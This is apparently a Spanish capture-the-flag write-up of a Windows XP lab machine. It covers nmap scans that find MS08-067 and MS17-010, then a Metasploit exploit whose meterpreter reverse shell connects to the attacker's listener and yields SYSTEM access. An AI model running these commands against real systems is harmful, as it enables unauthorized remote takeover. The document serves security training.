Enumeramos puertos:
❯ sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.139❯ nmap -sCV -p135,139,445 -oN 02-targeted.txt 192.168.1.139
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-16 23:23 -04
Nmap scan report for 192.168.1.139
Host is up (0.00071s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open `$���U Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: EXPERIENCE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5c:f5:cd (Oracle VirtualBox virtual NIC)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: experience
| NetBIOS computer name: EXPERIENCE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-05-17T00:23:42-07:00
|_clock-skew: mean: 7h29m57s, deviation: 4h56m59s, median: 3h59m57s
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Se trata de un Windows XP con SMB expuesto, un objetivo clásico para vulnerabilidades de RCE en SMBv1. Lanzamos los scripts vuln de nmap contra el puerto 445:
❯ nmap --script vuln -p445 192.168.1.139
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-16 23:26 -04
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.139
Host is up (0.0013s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 48.77 secondsEl escaneo confirma dos vulnerabilidades de ejecución remota de código: MS08-067 (CVE-2008-4250) y MS17-010 (CVE-2017-0143). Cualquiera de las dos sirve para comprometer la máquina.
Primero explotamos MS08-067 con el módulo correspondiente de Metasploit:
msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
sing-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] 192.168.1.139:445 - Automatically detecting the target...
[*] 192.168.1.139:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.1.139:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.1.139:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176198 bytes) to 192.168.1.139
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.139:1029) at 2024-05-16 23:48:45 -0400
meterpreter > shell
Process 1896 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>Obtenemos una shell con privilegios de NT AUTHORITY\SYSTEM y, con ella, ambas flags.
A modo de práctica, la vulnerabilidad MS17-010 se explota con el mismo procedimiento, cargando el módulo exploit/windows/smb/ms17_010_psexec.
Fin.